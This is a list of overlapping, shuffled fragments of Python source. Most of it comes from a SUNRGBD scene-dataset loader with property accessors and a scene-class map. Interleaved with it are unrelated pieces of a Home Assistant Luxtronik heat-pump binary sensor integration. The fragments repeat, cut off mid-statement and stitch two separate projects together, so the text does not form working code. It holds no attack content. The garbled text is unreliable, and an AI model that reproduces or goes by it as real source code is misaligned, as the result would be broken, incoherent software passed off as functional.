"- 1 rel_seq_path = path[start_ind:end_ind] data_path = os.path.join(params.dataset_path, 'SUNRGBD') instance_path = data_path +",
"self._Rtilt @Rtilt.setter def Rtilt(self, Rtilt): self._Rtilt = Rtilt @property def K(self): return self._K",
"None self._K = None @property def data_type(self): return self._data_type @data_type.setter def data_type(self, data_type):",
"def get_class_names(ids): names = [] for _id in ids: _name = class_id_to_name[str(_id)] names.append(_name)",
"= img_name self._split = split self._sequence_name = None self._intrinsics = None self._extrinsics =",
"img_dir_name = 'image/' else: img_dir_name = 'depth/' img_name = os.listdir(os.path.join(instance_path, img_dir_name))[0] path =",
"os.listdir(os.path.join(instance_path, 'extrinsics/'))[0]), dtype=np.float32) sunrgbd_image = SunRGBDImage(data_type, img_name, path, str(label), split) sunrgbd_image.sequence_name = rel_seq_path",
"@K.setter def K(self, K): self._K = K def get_fullname(self): return self.label + '__'",
"= None @property def data_type(self): return self._data_type @data_type.setter def data_type(self, data_type): self._data_type =",
"def data_type(self, data_type): self._data_type = data_type @property def path(self): return self._path @path.setter def",
"== DataTypesSUNRGBD.RGB: img_dir_name = 'image/' else: img_dir_name = 'depth/' img_name = os.listdir(os.path.join(instance_path, img_dir_name))[0]",
"split(self): return self._split @split.setter def split(self, split): self._split = split @property def sequence_name(self):",
"self._img_name @img_name.setter def img_name(self, img_name): self._img_name = img_name @property def split(self): return self._split",
"names.append(_name) return np.asarray(names) def _is_category_available(cat_name): for cat in class_names: if cat == cat_name:",
"self.label + '__' + self.sequence_name.replace('/', '_') + '_' + self.img_name def is_scene_challenge_category(self): return",
"def data_type(self): return self._data_type @data_type.setter def data_type(self, data_type): self._data_type = data_type @property def",
"= data_type self._path = path self._label = label self._img_name = img_name self._split =",
"return self._img_name @img_name.setter def img_name(self, img_name): self._img_name = img_name @property def split(self): return",
"@extrinsics.setter def extrinsics(self, extrinsics): self._extrinsics = extrinsics @property def Rtilt(self): return self._Rtilt @Rtilt.setter",
"img_name(self): return self._img_name @img_name.setter def img_name(self, img_name): self._img_name = img_name @property def split(self):",
"path(self, path): self._path = path @property def label(self): return self._label @label.setter def label(self,",
"[] for name in names: _id = class_name_to_id[name] ids.append(_id) return np.asarray(ids, dtype=np.int) def",
"def K(self, K): self._K = K def get_fullname(self): return self.label + '__' +",
"= os.path.join(params.dataset_path, 'SUNRGBD') instance_path = data_path + rel_seq_path label = np.loadtxt(os.path.join(instance_path, 'scene.txt'), dtype=str)",
"self._sequence_name = None self._intrinsics = None self._extrinsics = None self._Rtilt = None self._K",
"np.asarray(ids, dtype=np.int) def get_class_names(ids): names = [] for _id in ids: _name =",
"def __init__(self, data_type, img_name, path, label, split): self._data_type = data_type self._path = path",
"@property def Rtilt(self): return self._Rtilt @Rtilt.setter def Rtilt(self, Rtilt): self._Rtilt = Rtilt @property",
"[] for _id in ids: _name = class_id_to_name[str(_id)] names.append(_name) return np.asarray(names) def _is_category_available(cat_name):",
"extrinsics(self, extrinsics): self._extrinsics = extrinsics @property def Rtilt(self): return self._Rtilt @Rtilt.setter def Rtilt(self,",
"= path[start_ind:end_ind] data_path = os.path.join(params.dataset_path, 'SUNRGBD') instance_path = data_path + rel_seq_path label =",
"self._K = K def get_fullname(self): return self.label + '__' + self.sequence_name.replace('/', '_') +",
"@property def intrinsics(self): return self._intrinsics @intrinsics.setter def intrinsics(self, intrinsics): self._intrinsics = intrinsics @property",
"return self._sequence_name @sequence_name.setter def sequence_name(self, sequence_name): self._sequence_name = sequence_name @property def intrinsics(self): return",
"sunrgbd_image.sequence_name = rel_seq_path sunrgbd_image.intrinsics = intrinsics sunrgbd_image.extrinsics = extrinsics return sunrgbd_image class SunRGBDImage:",
"def split(self): return self._split @split.setter def split(self, split): self._split = split @property def",
"\"dining_room\", \"8\": \"discussion_area\", \"9\": \"furniture_store\", \"10\": \"home_office\", \"11\": \"kitchen\", \"12\": \"lab\", \"13\": \"lecture_theatre\",",
"self._Rtilt = None self._K = None @property def data_type(self): return self._data_type @data_type.setter def",
"\"7\": \"dining_room\", \"8\": \"discussion_area\", \"9\": \"furniture_store\", \"10\": \"home_office\", \"11\": \"kitchen\", \"12\": \"lab\", \"13\":",
"_name = class_id_to_name[str(_id)] names.append(_name) return np.asarray(names) def _is_category_available(cat_name): for cat in class_names: if",
"\"11\": \"kitchen\", \"12\": \"lab\", \"13\": \"lecture_theatre\", \"14\": \"library\", \"15\": \"living_room\", \"16\": \"office\", \"17\":",
"img_name = os.listdir(os.path.join(instance_path, img_dir_name))[0] path = os.path.join(instance_path, img_dir_name+img_name) intrinsics = np.loadtxt(os.path.join(instance_path, 'intrinsics.txt'), dtype=np.float32)",
"DataTypesSUNRGBD.RGB: img_dir_name = 'image/' else: img_dir_name = 'depth/' img_name = os.listdir(os.path.join(instance_path, img_dir_name))[0] path",
"= intrinsics sunrgbd_image.extrinsics = extrinsics return sunrgbd_image class SunRGBDImage: def __init__(self, data_type, img_name,",
"self._label @label.setter def label(self, label): self._label = label @property def img_name(self): return self._img_name",
"= class_name_to_id[name] ids.append(_id) return np.asarray(ids, dtype=np.int) def get_class_names(ids): names = [] for _id",
"split @property def sequence_name(self): return self._sequence_name @sequence_name.setter def sequence_name(self, sequence_name): self._sequence_name = sequence_name",
"data_type == DataTypesSUNRGBD.RGB: img_dir_name = 'image/' else: img_dir_name = 'depth/' img_name = os.listdir(os.path.join(instance_path,",
"in class_names: if cat == cat_name: return True return False def load_props(params, path,",
"def split(self, split): self._split = split @property def sequence_name(self): return self._sequence_name @sequence_name.setter def",
"get_class_ids(names): ids = [] for name in names: _id = class_name_to_id[name] ids.append(_id) return",
"{v: k for k, v in class_id_to_name.items()} class_names = set(class_id_to_name.values()) def get_class_ids(names): ids",
"def _is_category_available(cat_name): for cat in class_names: if cat == cat_name: return True return",
"path @property def label(self): return self._label @label.setter def label(self, label): self._label = label",
"self._K @K.setter def K(self, K): self._K = K def get_fullname(self): return self.label +",
"self._label = label @property def img_name(self): return self._img_name @img_name.setter def img_name(self, img_name): self._img_name",
"\"1\": \"bedroom\", \"2\": \"classroom\", \"3\": \"computer_room\", \"4\": \"conference_room\", \"5\": \"corridor\", \"6\": \"dining_area\", \"7\":",
"class_id_to_name.items()} class_names = set(class_id_to_name.values()) def get_class_ids(names): ids = [] for name in names:",
"DataTypesSUNRGBD class_id_to_name = { \"0\": \"bathroom\", \"1\": \"bedroom\", \"2\": \"classroom\", \"3\": \"computer_room\", \"4\":",
"\"2\": \"classroom\", \"3\": \"computer_room\", \"4\": \"conference_room\", \"5\": \"corridor\", \"6\": \"dining_area\", \"7\": \"dining_room\", \"8\":",
"def K(self): return self._K @K.setter def K(self, K): self._K = K def get_fullname(self):",
"def label(self): return self._label @label.setter def label(self, label): self._label = label @property def",
"path, split): start_ind = path.find('SUNRGBD') + 7 end_ind = path.rfind('\\\\') - 1 rel_seq_path",
"@intrinsics.setter def intrinsics(self, intrinsics): self._intrinsics = intrinsics @property def extrinsics(self): return self._extrinsics @extrinsics.setter",
"= label @property def img_name(self): return self._img_name @img_name.setter def img_name(self, img_name): self._img_name =",
"@property def K(self): return self._K @K.setter def K(self, K): self._K = K def",
"def intrinsics(self): return self._intrinsics @intrinsics.setter def intrinsics(self, intrinsics): self._intrinsics = intrinsics @property def",
"@property def sequence_name(self): return self._sequence_name @sequence_name.setter def sequence_name(self, sequence_name): self._sequence_name = sequence_name @property",
"return True return False def load_props(params, path, split): start_ind = path.find('SUNRGBD') + 7",
"dtype=np.float32) extrinsics = np.loadtxt(os.path.join( instance_path, 'extrinsics/' + os.listdir(os.path.join(instance_path, 'extrinsics/'))[0]), dtype=np.float32) sunrgbd_image = SunRGBDImage(data_type,",
"\"study_space\" } class_name_to_id = {v: k for k, v in class_id_to_name.items()} class_names =",
"for name in names: _id = class_name_to_id[name] ids.append(_id) return np.asarray(ids, dtype=np.int) def get_class_names(ids):",
"+ 7 end_ind = path.rfind('\\\\') - 1 rel_seq_path = path[start_ind:end_ind] data_path = os.path.join(params.dataset_path,",
"else: img_dir_name = 'depth/' img_name = os.listdir(os.path.join(instance_path, img_dir_name))[0] path = os.path.join(instance_path, img_dir_name+img_name) intrinsics",
"return self._label @label.setter def label(self, label): self._label = label @property def img_name(self): return",
"@property def data_type(self): return self._data_type @data_type.setter def data_type(self, data_type): self._data_type = data_type @property",
"return np.asarray(names) def _is_category_available(cat_name): for cat in class_names: if cat == cat_name: return",
"True return False def load_props(params, path, split): start_ind = path.find('SUNRGBD') + 7 end_ind",
"= None self._extrinsics = None self._Rtilt = None self._K = None @property def",
"cat_name: return True return False def load_props(params, path, split): start_ind = path.find('SUNRGBD') +",
"= split self._sequence_name = None self._intrinsics = None self._extrinsics = None self._Rtilt =",
"@Rtilt.setter def Rtilt(self, Rtilt): self._Rtilt = Rtilt @property def K(self): return self._K @K.setter",
"self._img_name = img_name @property def split(self): return self._split @split.setter def split(self, split): self._split",
"if data_type == DataTypesSUNRGBD.RGB: img_dir_name = 'image/' else: img_dir_name = 'depth/' img_name =",
"str(label), split) sunrgbd_image.sequence_name = rel_seq_path sunrgbd_image.intrinsics = intrinsics sunrgbd_image.extrinsics = extrinsics return sunrgbd_image",
"dtype=np.int) def get_class_names(ids): names = [] for _id in ids: _name = class_id_to_name[str(_id)]",
"= path.find('SUNRGBD') + 7 end_ind = path.rfind('\\\\') - 1 rel_seq_path = path[start_ind:end_ind] data_path",
"intrinsics sunrgbd_image.extrinsics = extrinsics return sunrgbd_image class SunRGBDImage: def __init__(self, data_type, img_name, path,",
"self._sequence_name = sequence_name @property def intrinsics(self): return self._intrinsics @intrinsics.setter def intrinsics(self, intrinsics): self._intrinsics",
"class_id_to_name = { \"0\": \"bathroom\", \"1\": \"bedroom\", \"2\": \"classroom\", \"3\": \"computer_room\", \"4\": \"conference_room\",",
"rel_seq_path = path[start_ind:end_ind] data_path = os.path.join(params.dataset_path, 'SUNRGBD') instance_path = data_path + rel_seq_path label",
"{ \"0\": \"bathroom\", \"1\": \"bedroom\", \"2\": \"classroom\", \"3\": \"computer_room\", \"4\": \"conference_room\", \"5\": \"corridor\",",
"\"kitchen\", \"12\": \"lab\", \"13\": \"lecture_theatre\", \"14\": \"library\", \"15\": \"living_room\", \"16\": \"office\", \"17\": \"rest_space\",",
"return self._Rtilt @Rtilt.setter def Rtilt(self, Rtilt): self._Rtilt = Rtilt @property def K(self): return",
"\"4\": \"conference_room\", \"5\": \"corridor\", \"6\": \"dining_area\", \"7\": \"dining_room\", \"8\": \"discussion_area\", \"9\": \"furniture_store\", \"10\":",
"= 'image/' else: img_dir_name = 'depth/' img_name = os.listdir(os.path.join(instance_path, img_dir_name))[0] path = os.path.join(instance_path,",
"extrinsics = np.loadtxt(os.path.join( instance_path, 'extrinsics/' + os.listdir(os.path.join(instance_path, 'extrinsics/'))[0]), dtype=np.float32) sunrgbd_image = SunRGBDImage(data_type, img_name,",
"= extrinsics @property def Rtilt(self): return self._Rtilt @Rtilt.setter def Rtilt(self, Rtilt): self._Rtilt =",
"\"bathroom\", \"1\": \"bedroom\", \"2\": \"classroom\", \"3\": \"computer_room\", \"4\": \"conference_room\", \"5\": \"corridor\", \"6\": \"dining_area\",",
"= [] for name in names: _id = class_name_to_id[name] ids.append(_id) return np.asarray(ids, dtype=np.int)",
"intrinsics(self): return self._intrinsics @intrinsics.setter def intrinsics(self, intrinsics): self._intrinsics = intrinsics @property def extrinsics(self):",
"K): self._K = K def get_fullname(self): return self.label + '__' + self.sequence_name.replace('/', '_')",
"basic_utils import DataTypesSUNRGBD class_id_to_name = { \"0\": \"bathroom\", \"1\": \"bedroom\", \"2\": \"classroom\", \"3\":",
"ids: _name = class_id_to_name[str(_id)] names.append(_name) return np.asarray(names) def _is_category_available(cat_name): for cat in class_names:",
"names: _id = class_name_to_id[name] ids.append(_id) return np.asarray(ids, dtype=np.int) def get_class_names(ids): names = []",
"img_name @property def split(self): return self._split @split.setter def split(self, split): self._split = split",
"\"discussion_area\", \"9\": \"furniture_store\", \"10\": \"home_office\", \"11\": \"kitchen\", \"12\": \"lab\", \"13\": \"lecture_theatre\", \"14\": \"library\",",
"data_path + rel_seq_path label = np.loadtxt(os.path.join(instance_path, 'scene.txt'), dtype=str) data_type = params.data_type if data_type",
"label(self, label): self._label = label @property def img_name(self): return self._img_name @img_name.setter def img_name(self,",
"= intrinsics @property def extrinsics(self): return self._extrinsics @extrinsics.setter def extrinsics(self, extrinsics): self._extrinsics =",
"path self._label = label self._img_name = img_name self._split = split self._sequence_name = None",
"\"library\", \"15\": \"living_room\", \"16\": \"office\", \"17\": \"rest_space\", \"18\": \"study_space\" } class_name_to_id = {v:",
"img_name): self._img_name = img_name @property def split(self): return self._split @split.setter def split(self, split):",
"\"home_office\", \"11\": \"kitchen\", \"12\": \"lab\", \"13\": \"lecture_theatre\", \"14\": \"library\", \"15\": \"living_room\", \"16\": \"office\",",
"path.rfind('\\\\') - 1 rel_seq_path = path[start_ind:end_ind] data_path = os.path.join(params.dataset_path, 'SUNRGBD') instance_path = data_path",
"class_names: if cat == cat_name: return True return False def load_props(params, path, split):",
"sequence_name @property def intrinsics(self): return self._intrinsics @intrinsics.setter def intrinsics(self, intrinsics): self._intrinsics = intrinsics",
"self._extrinsics = extrinsics @property def Rtilt(self): return self._Rtilt @Rtilt.setter def Rtilt(self, Rtilt): self._Rtilt",
"= extrinsics return sunrgbd_image class SunRGBDImage: def __init__(self, data_type, img_name, path, label, split):",
"K(self): return self._K @K.setter def K(self, K): self._K = K def get_fullname(self): return",
"'depth/' img_name = os.listdir(os.path.join(instance_path, img_dir_name))[0] path = os.path.join(instance_path, img_dir_name+img_name) intrinsics = np.loadtxt(os.path.join(instance_path, 'intrinsics.txt'),",
"+ os.listdir(os.path.join(instance_path, 'extrinsics/'))[0]), dtype=np.float32) sunrgbd_image = SunRGBDImage(data_type, img_name, path, str(label), split) sunrgbd_image.sequence_name =",
"extrinsics): self._extrinsics = extrinsics @property def Rtilt(self): return self._Rtilt @Rtilt.setter def Rtilt(self, Rtilt):",
"path, str(label), split) sunrgbd_image.sequence_name = rel_seq_path sunrgbd_image.intrinsics = intrinsics sunrgbd_image.extrinsics = extrinsics return",
"sunrgbd_image.extrinsics = extrinsics return sunrgbd_image class SunRGBDImage: def __init__(self, data_type, img_name, path, label,",
"return np.asarray(ids, dtype=np.int) def get_class_names(ids): names = [] for _id in ids: _name",
"intrinsics(self, intrinsics): self._intrinsics = intrinsics @property def extrinsics(self): return self._extrinsics @extrinsics.setter def extrinsics(self,",
"def get_fullname(self): return self.label + '__' + self.sequence_name.replace('/', '_') + '_' + self.img_name",
"= path.rfind('\\\\') - 1 rel_seq_path = path[start_ind:end_ind] data_path = os.path.join(params.dataset_path, 'SUNRGBD') instance_path =",
"def Rtilt(self, Rtilt): self._Rtilt = Rtilt @property def K(self): return self._K @K.setter def",
"= None self._K = None @property def data_type(self): return self._data_type @data_type.setter def data_type(self,",
"\"bedroom\", \"2\": \"classroom\", \"3\": \"computer_room\", \"4\": \"conference_room\", \"5\": \"corridor\", \"6\": \"dining_area\", \"7\": \"dining_room\",",
"label(self): return self._label @label.setter def label(self, label): self._label = label @property def img_name(self):",
"def img_name(self): return self._img_name @img_name.setter def img_name(self, img_name): self._img_name = img_name @property def",
"_id in ids: _name = class_id_to_name[str(_id)] names.append(_name) return np.asarray(names) def _is_category_available(cat_name): for cat",
"np.loadtxt(os.path.join(instance_path, 'scene.txt'), dtype=str) data_type = params.data_type if data_type == DataTypesSUNRGBD.RGB: img_dir_name = 'image/'",
"'SUNRGBD') instance_path = data_path + rel_seq_path label = np.loadtxt(os.path.join(instance_path, 'scene.txt'), dtype=str) data_type =",
"@property def img_name(self): return self._img_name @img_name.setter def img_name(self, img_name): self._img_name = img_name @property",
"@split.setter def split(self, split): self._split = split @property def sequence_name(self): return self._sequence_name @sequence_name.setter",
"\"living_room\", \"16\": \"office\", \"17\": \"rest_space\", \"18\": \"study_space\" } class_name_to_id = {v: k for",
"@sequence_name.setter def sequence_name(self, sequence_name): self._sequence_name = sequence_name @property def intrinsics(self): return self._intrinsics @intrinsics.setter",
"_id = class_name_to_id[name] ids.append(_id) return np.asarray(ids, dtype=np.int) def get_class_names(ids): names = [] for",
"if cat == cat_name: return True return False def load_props(params, path, split): start_ind",
"= data_path + rel_seq_path label = np.loadtxt(os.path.join(instance_path, 'scene.txt'), dtype=str) data_type = params.data_type if",
"\"17\": \"rest_space\", \"18\": \"study_space\" } class_name_to_id = {v: k for k, v in",
"label self._img_name = img_name self._split = split self._sequence_name = None self._intrinsics = None",
"sunrgbd_image class SunRGBDImage: def __init__(self, data_type, img_name, path, label, split): self._data_type = data_type",
"@property def path(self): return self._path @path.setter def path(self, path): self._path = path @property",
"= sequence_name @property def intrinsics(self): return self._intrinsics @intrinsics.setter def intrinsics(self, intrinsics): self._intrinsics =",
"\"dining_area\", \"7\": \"dining_room\", \"8\": \"discussion_area\", \"9\": \"furniture_store\", \"10\": \"home_office\", \"11\": \"kitchen\", \"12\": \"lab\",",
"Rtilt(self, Rtilt): self._Rtilt = Rtilt @property def K(self): return self._K @K.setter def K(self,",
"} class_name_to_id = {v: k for k, v in class_id_to_name.items()} class_names = set(class_id_to_name.values())",
"intrinsics = np.loadtxt(os.path.join(instance_path, 'intrinsics.txt'), dtype=np.float32) extrinsics = np.loadtxt(os.path.join( instance_path, 'extrinsics/' + os.listdir(os.path.join(instance_path, 'extrinsics/'))[0]),",
"class_names = set(class_id_to_name.values()) def get_class_ids(names): ids = [] for name in names: _id",
"cat in class_names: if cat == cat_name: return True return False def load_props(params,",
"Rtilt): self._Rtilt = Rtilt @property def K(self): return self._K @K.setter def K(self, K):",
"class_name_to_id = {v: k for k, v in class_id_to_name.items()} class_names = set(class_id_to_name.values()) def",
"data_path = os.path.join(params.dataset_path, 'SUNRGBD') instance_path = data_path + rel_seq_path label = np.loadtxt(os.path.join(instance_path, 'scene.txt'),",
"\"18\": \"study_space\" } class_name_to_id = {v: k for k, v in class_id_to_name.items()} class_names",
"for cat in class_names: if cat == cat_name: return True return False def",
"'extrinsics/' + os.listdir(os.path.join(instance_path, 'extrinsics/'))[0]), dtype=np.float32) sunrgbd_image = SunRGBDImage(data_type, img_name, path, str(label), split) sunrgbd_image.sequence_name",
"Rtilt @property def K(self): return self._K @K.setter def K(self, K): self._K = K",
"np from basic_utils import DataTypesSUNRGBD class_id_to_name = { \"0\": \"bathroom\", \"1\": \"bedroom\", \"2\":",
"= class_id_to_name[str(_id)] names.append(_name) return np.asarray(names) def _is_category_available(cat_name): for cat in class_names: if cat",
"instance_path = data_path + rel_seq_path label = np.loadtxt(os.path.join(instance_path, 'scene.txt'), dtype=str) data_type = params.data_type",
"import os import numpy as np from basic_utils import DataTypesSUNRGBD class_id_to_name = {",
"None @property def data_type(self): return self._data_type @data_type.setter def data_type(self, data_type): self._data_type = data_type",
"self._split = split self._sequence_name = None self._intrinsics = None self._extrinsics = None self._Rtilt",
"dtype=np.float32) sunrgbd_image = SunRGBDImage(data_type, img_name, path, str(label), split) sunrgbd_image.sequence_name = rel_seq_path sunrgbd_image.intrinsics =",
"= np.loadtxt(os.path.join(instance_path, 'scene.txt'), dtype=str) data_type = params.data_type if data_type == DataTypesSUNRGBD.RGB: img_dir_name =",
"'image/' else: img_dir_name = 'depth/' img_name = os.listdir(os.path.join(instance_path, img_dir_name))[0] path = os.path.join(instance_path, img_dir_name+img_name)",
"= os.listdir(os.path.join(instance_path, img_dir_name))[0] path = os.path.join(instance_path, img_dir_name+img_name) intrinsics = np.loadtxt(os.path.join(instance_path, 'intrinsics.txt'), dtype=np.float32) extrinsics",
"self._Rtilt = Rtilt @property def K(self): return self._K @K.setter def K(self, K): self._K",
"== cat_name: return True return False def load_props(params, path, split): start_ind = path.find('SUNRGBD')",
"os.path.join(params.dataset_path, 'SUNRGBD') instance_path = data_path + rel_seq_path label = np.loadtxt(os.path.join(instance_path, 'scene.txt'), dtype=str) data_type",
"data_type, img_name, path, label, split): self._data_type = data_type self._path = path self._label =",
"split): self._data_type = data_type self._path = path self._label = label self._img_name = img_name",
"'scene.txt'), dtype=str) data_type = params.data_type if data_type == DataTypesSUNRGBD.RGB: img_dir_name = 'image/' else:",
"def extrinsics(self): return self._extrinsics @extrinsics.setter def extrinsics(self, extrinsics): self._extrinsics = extrinsics @property def",
"sunrgbd_image.intrinsics = intrinsics sunrgbd_image.extrinsics = extrinsics return sunrgbd_image class SunRGBDImage: def __init__(self, data_type,",
"def get_class_ids(names): ids = [] for name in names: _id = class_name_to_id[name] ids.append(_id)",
"\"3\": \"computer_room\", \"4\": \"conference_room\", \"5\": \"corridor\", \"6\": \"dining_area\", \"7\": \"dining_room\", \"8\": \"discussion_area\", \"9\":",
"split(self, split): self._split = split @property def sequence_name(self): return self._sequence_name @sequence_name.setter def sequence_name(self,",
"\"conference_room\", \"5\": \"corridor\", \"6\": \"dining_area\", \"7\": \"dining_room\", \"8\": \"discussion_area\", \"9\": \"furniture_store\", \"10\": \"home_office\","
] |
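For orientation, a minimal usage sketch of the loader above. The SimpleNamespace params object and the kv1/NYUdata/NYU0001 sequence path are illustrative assumptions, not part of the original module; all that load_props actually needs is a params object exposing dataset_path and data_type.

from types import SimpleNamespace

# Hypothetical params stand-in; the project defines its own params type and
# only the dataset_path/data_type attributes are read by load_props.
params = SimpleNamespace(dataset_path='/data', data_type=DataTypesSUNRGBD.RGB)

# Illustrative sequence path following the usual SUNRGBD directory layout.
image = load_props(params, '/data/SUNRGBD/kv1/NYUdata/NYU0001', split='train')
print(image.path, image.sequence_name)
print(image.intrinsics)  # camera intrinsics loaded from intrinsics.txt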
# Source: BenPru/luxtronik
"""Support for Luxtronik heatpump binary states."""
# region Imports
import logging
from typing import Any, Final

import homeassistant.helpers.config_validation as cv
import voluptuous as vol
from homeassistant.components.binary_sensor import (DEVICE_CLASS_LOCK,
                                                    DEVICE_CLASS_RUNNING,
                                                    PLATFORM_SCHEMA,
                                                    BinarySensorEntity)
from homeassistant.components.sensor import ENTITY_ID_FORMAT
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import (CONF_FRIENDLY_NAME, CONF_ICON, CONF_ID,
                                 CONF_SENSORS)
from homeassistant.core import HomeAssistant
from homeassistant.helpers.entity import ENTITY_CATEGORIES, DeviceInfo
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.helpers.typing import ConfigType
from homeassistant.helpers.restore_state import RestoreEntity
from homeassistant.util import slugify

from .const import *
from .helpers.helper import get_sensor_text
from .luxtronik_device import LuxtronikDevice
# endregion Imports

# region Constants
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
    {
        vol.Required(CONF_SENSORS): vol.All(
            cv.ensure_list,
            [
                {
                    vol.Required(CONF_GROUP): vol.All(
                        cv.string,
                        vol.In([CONF_PARAMETERS, CONF_CALCULATIONS, CONF_VISIBILITIES]),
                    ),
                    vol.Required(CONF_ID): cv.string,
                    vol.Optional(CONF_FRIENDLY_NAME): cv.string,
                    vol.Optional(CONF_ICON): cv.string,
                    vol.Optional(CONF_INVERT_STATE, default=False): cv.boolean,
                }
            ],
        )
    }
)
# endregion Constants

# region Setup
async def async_setup_platform(
    hass: HomeAssistant,
    config: ConfigType,
    async_add_entities: AddEntitiesCallback,
    discovery_info: dict[str, Any] = None,
) -> None:
    """Set up a Luxtronik binary sensor from yaml config."""
    LOGGER.info(f"{DOMAIN}.binary_sensor.async_setup_platform ConfigType: %s - discovery_info: %s",
                config, discovery_info)
    luxtronik: LuxtronikDevice = hass.data.get(DOMAIN)
    if not luxtronik:
        LOGGER.warning("binary_sensor.async_setup_platform no luxtronik!")
        return False

    # use_legacy_sensor_ids = hass.data[f"{DOMAIN}_{CONF_USE_LEGACY_SENSOR_IDS}"]
    deviceInfo = hass.data[f"{DOMAIN}_DeviceInfo"]
    deviceInfoDomesticWater = hass.data[f"{DOMAIN}_DeviceInfo_Domestic_Water"]
    deviceInfoHeating = hass.data[f"{DOMAIN}_DeviceInfo_Heating"]
    deviceInfoCooling = hass.data[f"{DOMAIN}_DeviceInfo_Cooling"]

    sensors = config.get(CONF_SENSORS)
    entities = []
    if sensors:
        # region Legacy part:
        for sensor_cfg in sensors:
            sensor_id = sensor_cfg[CONF_ID]
            if '.' in sensor_id:
                group = sensor_id.split('.')[0]
                sensor_id = sensor_id.split('.')[1]
            else:
                group = sensor_cfg[CONF_GROUP]
            sensor = luxtronik.get_sensor(group, sensor_id)
            if sensor:
                name = sensor.name if not sensor_cfg.get(
                    CONF_FRIENDLY_NAME) else sensor_cfg.get(CONF_FRIENDLY_NAME)
                entity_id = "luxtronik.{}".format(slugify(name))  # if use_legacy_sensor_ids else None
                LOGGER.info(
                    "binary_sensor.async_setup_platform create entity_id: '%s'", entity_id)
                entities += [
                    LuxtronikBinarySensor(
                        hass, luxtronik, deviceInfo=deviceInfo,
                        sensor_key=f"{group}.{sensor_id}",
                        unique_id=sensor_id, name=name,
                        icon=sensor_cfg.get(CONF_ICON),
                        device_class=DEVICE_CLASSES.get(
                            sensor.measurement_type, DEFAULT_DEVICE_CLASS),
                        state_class=None,
                        invert_state=sensor_cfg.get(CONF_INVERT_STATE))
                ]
            else:
                LOGGER.warning(
                    "Invalid Luxtronik ID %s in group %s",
                    sensor_id,
                    group,
                )
        # endregion Legacy part:
    async_add_entities(entities)


async def async_setup_entry(
    hass: HomeAssistant,
    config_entry: ConfigEntry,
    async_add_entities: AddEntitiesCallback
) -> None:
    """Set up a Luxtronik sensor from ConfigEntry."""
    LOGGER.info(f"{DOMAIN}.binary_sensor.async_setup_entry ConfigType: %s", config_entry)
    luxtronik: LuxtronikDevice = hass.data.get(DOMAIN)
    if not luxtronik:
        LOGGER.warning("binary_sensor.async_setup_entry no luxtronik!")
        return False

    deviceInfo = hass.data[f"{DOMAIN}_DeviceInfo"]
    deviceInfoHeating = hass.data[f"{DOMAIN}_DeviceInfo_Heating"]

    # Build Sensor names with local language:
    lang = config_entry.options.get(CONF_LANGUAGE_SENSOR_NAMES)
    text_evu_unlocked = get_sensor_text(lang, 'evu_unlocked')
    entities = [
        LuxtronikBinarySensor(
            hass=hass, luxtronik=luxtronik, deviceInfo=deviceInfo,
            sensor_key=LUX_BINARY_SENSOR_EVU_UNLOCKED,
            unique_id='evu_unlocked', name=text_evu_unlocked,
            icon='mdi:lock', device_class=DEVICE_CLASS_LOCK)
    ]

    deviceInfoDomesticWater = hass.data[f"{DOMAIN}_DeviceInfo_Domestic_Water"]
    if deviceInfoDomesticWater is not None:
        text_solar_pump = get_sensor_text(lang, 'solar_pump')
        entities += [
            LuxtronikBinarySensor(
                hass=hass, luxtronik=luxtronik, deviceInfo=deviceInfoDomesticWater,
                sensor_key=LUX_BINARY_SENSOR_SOLAR_PUMP,
                unique_id='solar_pump', name=text_solar_pump,
                icon='mdi:pump', device_class=DEVICE_CLASS_RUNNING)
        ]

    deviceInfoCooling = hass.data[f"{DOMAIN}_DeviceInfo_Cooling"]
    if deviceInfoCooling is not None:
        text_approval_cooling = get_sensor_text(lang, 'approval_cooling')
        entities += [
            LuxtronikBinarySensor(
                hass=hass, luxtronik=luxtronik, deviceInfo=deviceInfoCooling,
                sensor_key='calculations.ID_WEB_FreigabKuehl',
                unique_id='approval_cooling', name=text_approval_cooling,
                icon='mdi:lock', device_class=DEVICE_CLASS_LOCK)
        ]

    async_add_entities(entities)
# endregion Setup


class LuxtronikBinarySensor(BinarySensorEntity, RestoreEntity):
    """Representation of a Luxtronik binary sensor."""

    def __init__(
        self,
        hass: HomeAssistant,
        luxtronik: LuxtronikDevice,
        deviceInfo: DeviceInfo,
        sensor_key: str,
        unique_id: str,
        name: str,
        icon: str,
        device_class: str,
        state_class: str = None,
        entity_category: ENTITY_CATEGORIES = None,
        invert_state: bool = False
    ) -> None:
        """Initialize a new Luxtronik binary sensor."""
        self.hass = hass
        self._luxtronik = luxtronik
        self._sensor_key = sensor_key
        self.entity_id = ENTITY_ID_FORMAT.format(f"{DOMAIN}_{unique_id}")
        self._attr_unique_id = self.entity_id
        self._attr_device_info = deviceInfo
        self._attr_name = name
        self._attr_icon = icon
        self._attr_device_class = device_class
        self._attr_state_class = state_class
        self._attr_entity_category = entity_category
        self._invert = invert_state

    @property
    def is_on(self):
        """Return true if binary sensor is on."""
        value = self._luxtronik.get_value(self._sensor_key)
        return not value if self._invert else value

    def update(self):
        """Get the latest status and use it to update our sensor state."""
        # (method body not recoverable from the fragments)
"a new Luxtronik binary sensor.\"\"\" self.hass = hass self._luxtronik = luxtronik self._sensor_key =",
"= sensor_id.split('.')[0] sensor_id = sensor_id.split('.')[1] else: group = sensor_cfg[CONF_GROUP] sensor = luxtronik.get_sensor(group, sensor_id)",
"Luxtronik ID %s in group %s\", sensor_id, group, ) # endregion Legacy part:",
"HomeAssistant, config_entry: ConfigEntry, async_add_entities: AddEntitiesCallback ) -> None: \"\"\"Set up a Luxtronik sensor",
"LuxtronikDevice, deviceInfo: DeviceInfo, sensor_key: str, unique_id: str, name: str, icon: str, device_class: str,",
"states.\"\"\" # region Imports import logging from typing import Any, Final import homeassistant.helpers.config_validation",
"sensor_id.split('.')[0] sensor_id = sensor_id.split('.')[1] else: group = sensor_cfg[CONF_GROUP] sensor = luxtronik.get_sensor(group, sensor_id) if",
"cv.ensure_list, [ { vol.Required(CONF_GROUP): vol.All( cv.string, vol.In( [CONF_PARAMETERS, CONF_CALCULATIONS, CONF_VISIBILITIES]), ), vol.Required(CONF_ID): cv.string,",
"invert_state: bool = False ) -> None: \"\"\"Initialize a new Luxtronik binary sensor.\"\"\"",
"\"\"\"Support for Luxtronik heatpump binary states.\"\"\" # region Imports import logging from typing",
